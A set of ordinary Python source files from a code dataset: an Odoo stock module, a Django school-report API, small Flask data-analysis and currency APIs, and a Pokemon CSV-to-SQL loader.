child_product_res.iteritems()))\n\n _columns = {\n 'default_code' : fields.char('Internal Reference', size=64, select=True, required=True),\n 'volume_total': fields.function(_volume_total, type='float', string='Total Volume', digits_compute=dp.get_precision('Payroll Rate'), help=\"The volume in m3 * qty_onhand\"),\n }\n\n def _check_ref(self, cr, uid, ids, context=None):\n obj = self.browse(cr, uid, ids[0], context=context)\n refs = self.search(cr, uid, [('default_code','=',obj.default_code)], context=context)\n if len(refs)>1:\n raise osv.except_osv('Invalid Action!', 'The product ref %s repeat again! 
Please check it!'%obj.default_code)\n return True\n\n _constraints = [\n (_check_ref, 'The internal reference must be unique!', ['default_code'])\n ]\n\n _sql_constraints = [\n ('uniq_default_code', 'unique(default_code)', \"The ref must be unique!\"),\n ]\n\n\n def copy(self, cr, uid, id, default=None, context=None):\n if context is None:\n context={}\n if not default:\n default = {}\n default = default.copy()\n code = self.read(cr, uid, id, ['default_code'], context=context)['default_code']\n default.update(default_code=\"%s(copy)\" % (code))\n return super(product_product, self).copy(cr, uid, id, default=default, context=context)\n\nproduct_product()\n\nclass stock_inventory_line(osv.osv):\n _inherit = \"stock.inventory.line\"\n _columns = {\n 'location_id': fields.many2one('stock.location', 'Location', required=True, states={'confirm': [('readonly', True)], 'done': [('readonly', True)]}),\n 'product_id': fields.many2one('product.product', 'Product', required=True, select=True, states={'confirm': [('readonly', True)], 'done': [('readonly', True)]}),\n 'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True, states={'confirm': [('readonly', True)], 'done': [('readonly', True)]}),\n 'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), states={'confirm': [('readonly', True)], 'done': [('readonly', True)]}),\n 'prod_lot_id': fields.many2one('stock.production.lot', 'Serial Number', domain=\"[('product_id','=',product_id)]\", states={'confirm': [('readonly', True)], 'done': [('readonly', True)]}),\n }\nstock_inventory_line()\n\nclass stock_warehouse(osv.osv):\n _inherit = \"stock.warehouse\"\n\n _columns = {\n 'code' : fields.char('Warehouse Code', size=32, select=True),\n }\n\nclass seconds_line(orm.Model):\n _name = 'seconds.line'\n\n _columns = {\n 'picking_id': fields.many2one('stock.picking', 'Picking', required=True, select=True, ),\n 'product_id': fields.many2one('product.product', 'Product', required=True, select=True, ),\n 'qty' : fields.integer('QTY', required=True),\n }\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n\n","repo_name":"haitunzzz/ODOO","sub_path":"stock_enhance/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":51161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26379957073","text":"import json\nfrom django.http import FileResponse\nfrom rest_framework import viewsets\nfrom results.serializers.report import ComputedReportSerializer\nfrom results.utils.pdf_report.competency_report import CompetencePDFReport\nfrom results.utils.pdf_report.termly_report import TermlyPDFReport\nfrom utils import get_host_name\nfrom results.utils import compute_student_report\nfrom results.utils.pdf_report.bulk_report import BulkPDFReport\nfrom ..models import ClassRoom, GradingSystem, Period, Report, Student\nfrom ..serializers import ReportSerializer\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom ..filters import ReportFilter\nimport os\nfrom django.views.decorators.cache import cache_page\nfrom django.core.cache import cache\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.vary import vary_on_cookie, vary_on_headers\n\n\nclass ReportViewSet(viewsets.ModelViewSet):\n queryset = Report.objects.all()\n serializer_class = ReportSerializer\n\n def get_queryset(self):\n queryset = super().get_queryset()\n class_room_pk = 
self.kwargs.get('class_room_pk')\n if class_room_pk:\n queryset = queryset.filter(promo_from_class_room=class_room_pk)\n params = self.request.query_params\n f = ReportFilter(queryset, params)\n queryset = f.filter()\n return queryset\n\n @action(detail=False, methods=['GET'], name='get_count', url_path='count')\n def get_count(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n count = queryset.count()\n return Response({'count': count})\n\n # @method_decorator(cache_page(60 * 15))\n @action(detail=False,\n methods=['GET'],\n name='get_computed_student_report',\n url_path=r'computed/(?P<student_id>[\\w-]+)')\n def get_student_computed_report(self, request, *args, **kwargs):\n params = self.request.query_params\n period = Period.objects.filter(id=params.get('period')).first()\n if not period:\n period = Period.objects.latest()\n student = Student.objects.filter(id=kwargs.get('student_id')).first()\n level_group = student.class_room.level.level_group\n grading_system = GradingSystem.objects.filter(\n is_default=True, level_group=level_group).first()\n report, computed_report = compute_student_report(\n student, grading_system, period)\n serializer = ComputedReportSerializer(computed_report)\n report.computation = serializer.data\n report.save()\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['POST'],\n name='download_student_report',\n url_path=r'computed/(?P<student_id>[\\w-]+)/download')\n def download_student_report(self, request, *args, **kwargs):\n params = self.request.query_params\n period = Period.objects.filter(id=params.get('period')).first()\n if not period:\n period = Period.objects.latest()\n student = Student.objects.filter(id=kwargs.get('student_id')).first()\n level_group = student.class_room.level.level_group\n grading_system = GradingSystem.objects.filter(\n is_default=True, level_group=level_group).first()\n res = cache.get(f'computed_report{student.id}')\n if res:\n report, computed_report = res\n else:\n report, computed_report = cache.get_or_set(\n f'computed_report{student.id}',\n compute_student_report(student, grading_system, period))\n serializer = ComputedReportSerializer(computed_report)\n columns = request.data.get('columns')\n report_type = request.data.get('report_type')\n if report_type == 'activity':\n pdf_report = CompetencePDFReport(computed_report,\n columns=columns,\n grading_system=grading_system,\n period=period)\n else:\n pdf_report = TermlyPDFReport(computed_report,\n columns=columns,\n grading_system=grading_system,\n period=period)\n\n doc = pdf_report.run()\n filename = os.path.basename(doc.filename)\n host = get_host_name(request)\n file_url = f'{host}/media/{filename}'\n report.computation = serializer.data\n report.save()\n return Response({'file_url': file_url})\n\n @action(detail=True,\n methods=['GET'],\n name='get_report_result',\n url_path='result')\n def get_report_result(self, request, pk, *args, **kwargs):\n params = self.request.query_params\n grading_system = GradingSystem.objects.filter(\n id=params.get('grading_system')).first()\n period = Period.objects.filter(id=params.get('period')).first()\n if not grading_system:\n grading_system = GradingSystem.objects.first()\n if not period:\n period = Period.objects.latest()\n\n report = Report.objects.get(id=pk)\n student_id = report.student_id\n report = compute_student_report(student_id, grading_system, period)\n return Response({\"points\": sum([subj.points for subj in report])})\n\n @action(detail=False,\n methods=['PUT'],\n 
name='bulk_competency_report_comment',\n url_path='competency/comment/bulk')\n def bulk_competency_report_comment(self, request, *args, **kwargs):\n data = request.data\n query = Report.objects.filter(\n competency_score__gte=data.get('competency_score__gte'),\n competency_score__lte=data.get('competency_score__lte'),\n student__class_room=data.get('student__class_room'),\n )\n overwrite = data.get('overwrite')\n teacher_group = data.get('teacher_group')\n comment = data.get('comment')\n if teacher_group == 'head':\n if not overwrite:\n query = query.filter(competency_head_teacher_comment='')\n query.update(competency_head_teacher_comment=comment)\n else:\n if not overwrite:\n query = query.filter(competency_class_teacher_comment='')\n query.update(competency_class_teacher_comment=comment)\n serializer = self.get_serializer(query, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['PUT'],\n name='bulk_termly_report_comment',\n url_path='termly/comment/bulk')\n def bulk_termly_report_comment(self, request, *args, **kwargs):\n data = request.data\n level_group_name = data.get('level_group_name')\n if level_group_name == 'A':\n query = Report.objects.filter(\n points__gte=data.get('points__gte'),\n points__lte=data.get('points__lte'),\n student__class_room=data.get('student__class_room'))\n else:\n query = Report.objects.filter(\n aggregates__gte=data.get('aggregates__gte'),\n aggregates__lte=data.get('aggregates__lte'))\n overwrite = data.get('overwrite')\n teacher_group = data.get('teacher_group')\n comment = data.get('comment')\n if teacher_group == 'head':\n if not overwrite:\n query = query.filter(head_teacher_comment='')\n query.update(head_teacher_comment=comment)\n else:\n if not overwrite:\n query = query.filter(class_teacher_comment='')\n query.update(class_teacher_comment=comment)\n serializer = self.get_serializer(query, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['PUT'],\n name='update_report_comment',\n url_path='comment')\n def update_report_comment(self, request, *args, **kwargs):\n data = request.data\n queryset1 = Report.objects.filter(id__in=data.get('reports'))\n queryset = queryset1\n overwrite = data.get('overwrite')\n del data['reports']\n del data['overwrite']\n if not overwrite:\n if data.get('class_teacher_comment'):\n queryset = queryset.filter(class_teacher_comment=\"\")\n if data.get('head_teacher_comment'):\n queryset = queryset.filter(head_teacher_comment=\"\")\n queryset.update(**data)\n serializer = self.get_serializer(queryset1, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['PUT'],\n name='update_report_competency_comment',\n url_path='competency/comment')\n def update_report_competency_comment(self, request, *args, **kwargs):\n data = request.data\n queryset1 = Report.objects.filter(id__in=data.get('reports'))\n queryset = queryset1\n overwrite = data.get('overwrite')\n del data['reports']\n del data['overwrite']\n if not overwrite:\n if data.get('competency_class_teacher_comment'):\n queryset = queryset.filter(competency_class_teacher_comment=\"\")\n if data.get('competency_head_teacher_comment'):\n queryset = queryset.filter(competency_head_teacher_comment=\"\")\n queryset.update(**data)\n serializer = self.get_serializer(queryset1, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['POST'],\n name='download_class_room_report',\n url_path=r'computed/class-rooms/(?P<class_room_id>[\\w-]+)/download'\n )\n def 
download_class_room_reports(self, request, *args, **kwargs):\n        data = self.request.data\n        params = self.request.query_params\n        class_room_id = kwargs.get('class_room_id')\n\n        period = Period.objects.filter(id=params.get('period')).first()\n        if not period:\n            period = Period.objects.latest()\n\n        class_room = ClassRoom.objects.filter(id=class_room_id).first()\n        grading_system = GradingSystem.objects.filter(\n            is_default=True, level_group=class_room.level.level_group).first()\n        students = Student.objects.filter(class_room=class_room).all()\n        computed_reports = [\n            compute_student_report(stud, grading_system, period)[1]\n            for stud in students\n        ]\n        report_type = data.get('report_type', 'assessment')\n        columns = data.get('columns', {'code': True})\n        # key the cache on the report type as well, so a cached 'activity'\n        # report is not served for an 'assessment' request (and vice versa)\n        res = cache.get(f'class_room_report_{class_room.id}_{report_type}')\n        if res:\n            bulk_report = res\n        else:\n            bulk_report = BulkPDFReport(computed_reports, report_type, columns,\n                                        grading_system, period)\n            cache.set(f'class_room_report_{class_room.id}_{report_type}', bulk_report)\n        doc = bulk_report.run()\n        filename = os.path.basename(doc.filename)\n        host = get_host_name(request)\n        file_url = f'{host}/media/{filename}'\n        return Response({'file_url': file_url})\n\n    @action(detail=False,\n            methods=['POST'],\n            name='add_promotions',\n            url_path='promotions/add')\n    def add_promotions(self, request, *args, **kwargs):\n        data = request.data\n        report_ids = data.get('reports')\n        to_class_room = data.get('promo_to_class_room')\n        from_class_room = data.get('promo_from_class_room')\n        report_qs = Report.objects.filter(id__in=report_ids)\n        report_qs.update(promo_from_class_room=from_class_room,\n                         promo_to_class_room=to_class_room)\n        serializer = self.get_serializer(report_qs, many=True)\n        return Response(serializer.data)\n\n    @action(detail=False,\n            methods=['PUT'],\n            name='approve_promotions',\n            url_path='approve')\n    def approve_promotions(self, request, *args, **kwargs):\n        data = request.data\n        report_ids = data.get('promotions')\n        report_qs = Report.objects.filter(id__in=report_ids)\n        report_qs.update(promo_is_approved=True)\n        serializer = self.get_serializer(report_qs, many=True)\n        return Response(serializer.data)\n\n    @action(detail=False,\n            methods=['PUT'],\n            name='reject_promotions',\n            url_path='reject')\n    def reject_promotions(self, request, *args, **kwargs):\n        data = request.data\n        report_ids = data.get('promotions')\n        report_qs = Report.objects.filter(id__in=report_ids)\n        report_qs.update(promo_is_approved=False)\n        serializer = self.get_serializer(report_qs, many=True)\n        return Response(serializer.data)","repo_name":"samuelitwaru/wex-erp","sub_path":"results/views/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":12771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30464221796","text":"# -*- coding: UTF-8 -*- \nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\nimport threading\nimport time\nimport pymysql\nfrom ariori import apriori,draw,loadDataSet\nfrom mysql import mysql_test,mysql_apriori,mysql_number,mysql_iris\nfrom iris import load_iris,cluster1,iris_data_scatter1\nfrom tree import tree,get_file,conver_img\nfrom number import load_number,number\n\n# configurations\nDEBUG = False\n\n# instantiate the app\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# enable CORS\nCORS(app, resources={r'/*': {'origins': '*'}})\n\n\n@app.route('/')\ndef hello_world():\n    return 'Hello World!'\n\n\n@app.route('/testapipost', methods=['post'])\ndef test():\n    
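# A hedged, self-contained sketch of the POST-JSON-in/JSON-out pattern this
# handler uses, with CORS enabled the same way; the /echo route, the `demo`
# app name, and the field names are invented for illustration.
from flask import Flask, request, jsonify
from flask_cors import CORS

demo = Flask(__name__)
CORS(demo, resources={r'/*': {'origins': '*'}})

@demo.route('/echo', methods=['POST'])
def echo():
    data = request.get_json(silent=True) or {}  # tolerate missing/invalid JSON
    return jsonify({'received': data})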
jobs=[{}]\n    data = request.get_json(silent=True)\n    x = data['firstName']\n    x = int(x)\n    a=mysql_test(x)\n    print(x)\n    jobs[0]=a\n    print(jobs)\n    return jsonify({'jobs':jobs})\n\n@app.route('/aprioriget', methods=['get'])\ndef aprioriget():\n    ad=loadDataSet()\n    apriori_data=mysql_apriori()\n    L, supportData = apriori(ad,minSupport=0.2)\n    apriori_draw=draw(L[1],supportData)\n    return jsonify({'aprioridata':apriori_data,'aprioridraw':apriori_draw})\n\n@app.route('/irisget', methods=['get'])\ndef irisget():\n    iris_data=mysql_iris()\n    X,y = load_iris()\n    x,iris_result_scatter,bar_num = cluster1(X,y)\n    iris_data_scatter=iris_data_scatter1(x,y)\n    return jsonify({'irisdata':iris_data,'irisdatascatter':iris_data_scatter,\n    'barnum':bar_num,'irisresultscatter':iris_result_scatter\n    })\n\n@app.route('/numberget', methods=['get'])\ndef numberget():\n    number_data=mysql_number()\n    x,y=load_number()\n    inlier,outlier,test_data,l1,l2,l3,l4=number(x,y)\n    return jsonify({'numberdata':number_data,\"inlier\":inlier,\n    'outlier':outlier,'test_data':test_data,\n    'l1':l1,'l2':l2,'l3':l3,'l4':l4\n    })\n\n@app.route('/treeget', methods=['get'])\ndef treeget():\n    iris_data=mysql_iris()\n    X,y = load_iris()\n    tree(X,y)\n    pdf_dir=[]\n    pdf_dir=get_file(pdf_dir)\n    conver_img(pdf_dir)\n    return jsonify({'irisdata':iris_data})\n\nif __name__ == '__main__':\n\n    # run the Flask app\n    app.run(host='127.0.0.1',port=5000) #debug=True\n","repo_name":"d12597/-","sub_path":"后端/app(1).py","file_name":"app(1).py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13447728226","text":"from flask import Flask, request, jsonify\nfrom main import currencyconverter\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\nconverter=currencyconverter()\n@app.route('/', methods=['GET'])\ndef home():\n\tjson=converter.rates()\n\treturn jsonify(json)\n@app.route('/chart', methods=['GET'])\ndef chart():\n\targs = request.args\n\tFrom = args['From']\n\tTo = args['To']\n\tjson=converter.chart(From,To)\n\treturn jsonify(json)\n@app.route('/statistics', methods=['GET'])\ndef statistic():\n\targs = request.args\n\tFrom = args['From']\n\tTo = args['To']\n\tjson=converter.statistics(From,To)\n\treturn jsonify(json)\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0', port=3003)","repo_name":"yunusaltuntas/curency-scrapy","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18393720985","text":"\nimport csv\nimport time\nimport pathlib\n\nfrom ..Log import Log\nfrom . 
import SQL\n\n\nasync def ingest_csv(csv_dir):\n    log = Log()\n    dex = {}\n\n    log.info(\"Load pokemon.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/pokemon.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        raw_dex = []\n        for entry in reader:\n            raw_dex.append(dict(entry))\n            for key in raw_dex[-1]:\n                try:\n                    raw_dex[-1][key] = int(raw_dex[-1][key])\n                except ValueError:\n                    pass\n\n    # We are unable to guarantee that ALL entries will have all data,\n    # so we load them with default NULLs into the DB\n    for entry in raw_dex:\n        pokemon_id = entry['id']\n        dex[pokemon_id] = {}\n        dex[pokemon_id]['gender_ratio'] = None\n        dex[pokemon_id]['catch_rate'] = None\n        dex[pokemon_id]['hatch_time'] = None\n        dex[pokemon_id]['base_happiness'] = None\n        dex[pokemon_id]['type2'] = None\n\n\n    for entry in raw_dex:\n        pokemon_id = entry['id']\n        dex[pokemon_id]['pokemon_id'] = pokemon_id\n        dex[pokemon_id]['identifier'] = entry['identifier']\n        dex[pokemon_id]['height'] = entry['height']\n        dex[pokemon_id]['weight'] = entry['weight']\n        dex[pokemon_id]['base_xp'] = entry['base_experience']\n    log.info(f\"pokemon loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(\"Load pokemon_stats.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/pokemon_stats.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        raw_stats = []\n        for entry in reader:\n            raw_stats.append(dict(entry))\n            for key in raw_stats[-1]:\n                try:\n                    raw_stats[-1][key] = int(raw_stats[-1][key])\n                except ValueError:\n                    pass\n\n    stat_lookup = {1: \"hp\", 2: \"attack\", 3: \"defense\", 4: \"sp_attack\", 5: \"sp_defense\", 6: \"speed\"}\n    for entry in raw_stats:\n        pokemon_id = entry['pokemon_id']\n        base_key = \"base_\" + stat_lookup[entry['stat_id']]\n        effort_key = \"effort_\" + stat_lookup[entry['stat_id']]\n        dex[pokemon_id][base_key] = entry['base_stat']\n        dex[pokemon_id][effort_key] = entry['effort']\n    log.info(f\"pokemon_stats loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(\"Load pokemon_species.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/pokemon_species.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        species_stats = []\n        for entry in reader:\n            species_stats.append(dict(entry))\n            for key in species_stats[-1]:\n                try:\n                    species_stats[-1][key] = int(species_stats[-1][key])\n                except ValueError:\n                    pass\n\n    for entry in species_stats:\n        pokemon_id = entry['id']\n        dex[pokemon_id]['gender_ratio'] = entry['gender_rate']\n        dex[pokemon_id]['catch_rate'] = entry['capture_rate']\n        dex[pokemon_id]['hatch_time'] = entry['hatch_counter']\n        dex[pokemon_id]['base_happiness'] = entry['base_happiness']\n    log.info(f\"pokemon_species loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(\"Load moves.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/moves.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        moves = []\n        for entry in reader:\n            moves.append(dict(entry))\n            for key in moves[-1]:\n                try:\n                    moves[-1][key] = int(moves[-1][key])\n                except ValueError:\n                    pass\n\n    # id is not used as-is; remap it to move_id, and pp to pp_max\n    for entry in moves:\n        entry['move_id'] = entry['id']\n        del entry['id']\n        entry['pp_max'] = entry['pp']\n        del entry['pp']\n    log.info(f\"moves loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(\"Load move_effect_prose.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/move_effect_prose.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        move_effect_prose = []\n        for entry in reader:\n            move_effect_prose.append(dict(entry))\n            for key in move_effect_prose[-1]:\n                try:\n                    move_effect_prose[-1][key] = 
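# Each file above is read with the same DictReader-plus-int-coercion block;
# a sketch of a helper that would factor it out (load_csv and the skip
# parameter are assumed names, not part of the original module):
import csv

def load_csv(path, skip=lambda row: False):
    rows = []
    with open(path) as csvfile:
        for entry in csv.DictReader(csvfile):
            row = dict(entry)
            if skip(row):
                continue
            for key, value in row.items():
                try:
                    row[key] = int(value)  # numeric columns become ints
                except ValueError:
                    pass  # leave non-numeric fields as strings
            rows.append(row)
    return rows

# e.g. moves = load_csv(csv_dir / "pokemon/moves.csv")
# or   names = load_csv(path, skip=lambda r: r['local_language_id'] != '9')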
int(move_effect_prose[-1][key])\n                except ValueError:\n                    pass\n\n    # the csv's move_effect_id column maps onto our effect_id\n    for entry in move_effect_prose:\n        entry['effect_id'] = entry['move_effect_id']\n        del entry['move_effect_id']\n    log.info(f\"move_effect_prose loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(\"Load pokemon_moves.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/pokemon_moves.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        pokemon_moves = []\n        for entry in reader:\n            pokemon_moves.append(dict(entry))\n            for key in pokemon_moves[-1]:\n                try:\n                    pokemon_moves[-1][key] = int(pokemon_moves[-1][key])\n                except ValueError:\n                    pass\n    log.info(f\"pokemon_moves loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(\"Load pokemon_move_method_prose.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/pokemon_move_method_prose.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        pokemon_move_method_prose = []\n        for entry in reader:\n            pokemon_move_method_prose.append(dict(entry))\n            for key in pokemon_move_method_prose[-1]:\n                try:\n                    pokemon_move_method_prose[-1][key] = int(pokemon_move_method_prose[-1][key])\n                except ValueError:\n                    pass\n    log.info(f\"pokemon_move_method_prose loaded in {time.time()-t_step:.3f}s\")\n\n\n    # Handle Pokemon\n    log.info(\"Load types.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/types.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        types = []\n        for entry in reader:\n            types.append(dict(entry))\n            for key in types[-1]:\n                try:\n                    types[-1][key] = int(types[-1][key])\n                except ValueError:\n                    pass\n    temp = tuple(types)\n    types = {}\n    for entry in temp:\n        types[entry['id']] = entry['identifier']\n    log.info(f\"types loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(\"Load pokemon_types.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/pokemon_types.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        pokemon_types = []\n        for entry in reader:\n            pokemon_types.append(dict(entry))\n            for key in pokemon_types[-1]:\n                try:\n                    pokemon_types[-1][key] = int(pokemon_types[-1][key])\n                except ValueError:\n                    pass\n\n    for entry in pokemon_types:\n        pokemon_id = entry['pokemon_id']\n        if entry['slot'] == 1:\n            dex[pokemon_id]['type1'] = entry['type_id']\n        elif entry['slot'] == 2:\n            dex[pokemon_id]['type2'] = entry['type_id']\n        else:\n            raise KeyError(f\"Unknown slot '{entry['slot']}'\")\n    log.info(f\"pokemon_types loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(\"Load type_efficacy.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"pokemon/type_efficacy.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        type_efficacy = []\n        for entry in reader:\n            type_efficacy.append(dict(entry))\n            for key in type_efficacy[-1]:\n                try:\n                    type_efficacy[-1][key] = int(type_efficacy[-1][key])\n                except ValueError:\n                    pass\n    log.info(f\"type_efficacy loaded in {time.time()-t_step:.3f}s\")\n\n    # Handle world generation\n\n    log.info(\"Load encounters.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"world/encounters.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        encounters = []\n        for entry in reader:\n            encounters.append(dict(entry))\n            for key in encounters[-1]:\n                try:\n                    encounters[-1][key] = int(encounters[-1][key])\n                except ValueError:\n                    pass\n    log.info(f\"encounters loaded in {time.time()-t_step:.3f}s\")\n\n    log.info(\"Load location_names.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"world/location_names.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        location_names = []\n        for entry in reader:\n            if 
entry['local_language_id'] != '9':\n                continue\n            location_names.append(dict(entry))\n            for key in location_names[-1]:\n                try:\n                    location_names[-1][key] = int(location_names[-1][key])\n                except ValueError:\n                    pass\n    log.info(f\"location_names loaded in {time.time()-t_step:.3f}s\")\n\n    log.info(\"Load zone_connections.csv\")\n    t_step = time.time()\n    with open(csv_dir / \"world/zone_connections.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        zone_connections = []\n        for entry in reader:\n            zone_connections.append(dict(entry))\n            for key in zone_connections[-1]:\n                try:\n                    zone_connections[-1][key] = int(zone_connections[-1][key])\n                except ValueError:\n                    pass\n    log.info(f\"zone_connections loaded in {time.time()-t_step:.3f}s\")\n\n    output = {}\n    output['encounters'] = encounters\n    output['location_names'] = location_names\n    output['move_effect_prose'] = move_effect_prose\n    output['moves'] = moves\n    output['pokedex'] = dex\n    output['pokemon_move_method_prose'] = pokemon_move_method_prose\n    output['pokemon_moves'] = pokemon_moves\n    output['type_efficacy'] = type_efficacy\n    output['types'] = types\n    output['zone_connections'] = zone_connections\n\n    return output\n\n\nasync def populate():\n    \"\"\"Attempt to populate basic tables\n    \"\"\"\n\n    log = Log()\n    sql = SQL.SQL()\n\n    log.info(\"Loading pokedex data\")\n\n    csv_dir = pathlib.Path(\"data/\")\n    t_start_csv = time.time()\n    data = await ingest_csv(csv_dir)\n\n\n    log.info(f\"Full csv load took {time.time()-t_start_csv:.3f}s\")\n\n\n    log.info(f\"Must load {len(data['pokedex'])} pokedex rows\")\n    t_start_sql = time.time()\n    t_step = time.time()\n    cur = sql.cur\n    for key in data['pokedex']:\n        # log.info(data[key])\n        cmd = \"\"\"INSERT INTO pokedex\n            (\n            pokemon_id,\n            identifier,\n            height,\n            weight,\n            base_xp,\n            base_hp,\n            base_attack,\n            base_defense,\n            base_sp_attack,\n            base_sp_defense,\n            base_speed,\n            effort_hp,\n            effort_attack,\n            effort_defense,\n            effort_sp_attack,\n            effort_sp_defense,\n            effort_speed,\n            gender_ratio,\n            catch_rate,\n            hatch_time,\n            type1,\n            type2\n            ) VALUES (\n            :pokemon_id,\n            :identifier,\n            :height,\n            :weight,\n            :base_xp,\n            :base_hp,\n            :base_attack,\n            :base_defense,\n            :base_sp_attack,\n            :base_sp_defense,\n            :base_speed,\n            :effort_hp,\n            :effort_attack,\n            :effort_defense,\n            :effort_sp_attack,\n            :effort_sp_defense,\n            :effort_speed,\n            :gender_ratio,\n            :catch_rate,\n            :hatch_time,\n            :type1,\n            :type2\n            )\"\"\"\n        cur.execute(cmd, data['pokedex'][key])\n    log.info(f\"pokedex loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(f\"Must load {len(data['moves'])} moves rows\")\n    t_start_sql = time.time()\n    t_step = time.time()\n    cur = sql.cur\n    for entry in data['moves']:\n        # log.info(entry)\n        cmd = \"\"\"INSERT INTO moves\n            (\n            move_id,\n            identifier,\n            generation_id,\n            type_id,\n            power,\n            pp_max,\n            accuracy,\n            priority,\n            target_id,\n            damage_class_id,\n            effect_id,\n            effect_chance,\n            contest_type_id,\n            contest_effect_id,\n            super_contest_effect_id\n            ) VALUES (\n            :move_id,\n            :identifier,\n            :generation_id,\n            :type_id,\n            :power,\n            :pp_max,\n            :accuracy,\n            :priority,\n            :target_id,\n            :damage_class_id,\n            :effect_id,\n            :effect_chance,\n            :contest_type_id,\n            :contest_effect_id,\n            :super_contest_effect_id\n            )\"\"\"\n        cur.execute(cmd, entry)\n    log.info(f\"moves loaded in {time.time()-t_step:.3f}s\")\n\n\n    log.info(f\"Must load {len(data['pokemon_moves'])} pokemon_moves rows\")\n    t_start_sql = time.time()\n    t_step = time.time()\n    cur = sql.cur\n    for entry in data['pokemon_moves']:\n        # log.info(data[key])\n        cmd = \"\"\"INSERT INTO pokemon_moves\n            (\n            
pokemon_id,\n version_group_id,\n move_id,\n pokemon_move_method_id,\n level\n ) VALUES (\n :pokemon_id,\n :version_group_id,\n :move_id,\n :pokemon_move_method_id,\n :level\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"pokemon_moves loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load {len(data['move_effect_prose'])} move_effect_prose rows\")\n t_start_sql = time.time()\n t_step = time.time()\n cur = sql.cur\n for entry in data['move_effect_prose']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO move_effect_prose\n (\n effect_id,\n local_language_id,\n short_effect,\n effect\n ) VALUES (\n :effect_id,\n :local_language_id,\n :short_effect,\n :effect\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"move_effect_prose loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load {len(data['pokemon_move_method_prose'])} pokemon_move_method_prose rows\")\n t_start_sql = time.time()\n t_step = time.time()\n cur = sql.cur\n for entry in data['pokemon_move_method_prose']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO pokemon_move_method_prose\n (\n pokemon_move_method_id,\n local_language_id,\n name,\n description\n ) VALUES (\n :pokemon_move_method_id,\n :local_language_id,\n :name,\n :description\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"pokemon_move_method_prose loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load types {len(data['types']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for key in data['types']:\n cmd = \"\"\"INSERT INTO types\n (\n type_id,\n identifier\n ) VALUES (\n :type_id,\n :identifier\n )\"\"\"\n type_id = key\n identifier = data['types'][key]\n cur.execute(cmd, locals())\n log.info(f\"types loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load type_efficacy {len(data['type_efficacy']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for entry in data['type_efficacy']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO type_efficacy\n (\n damage_type_id,\n target_type_id,\n damage_factor\n ) VALUES (\n :damage_type_id,\n :target_type_id,\n :damage_factor\n )\"\"\"\n cur.execute(cmd, 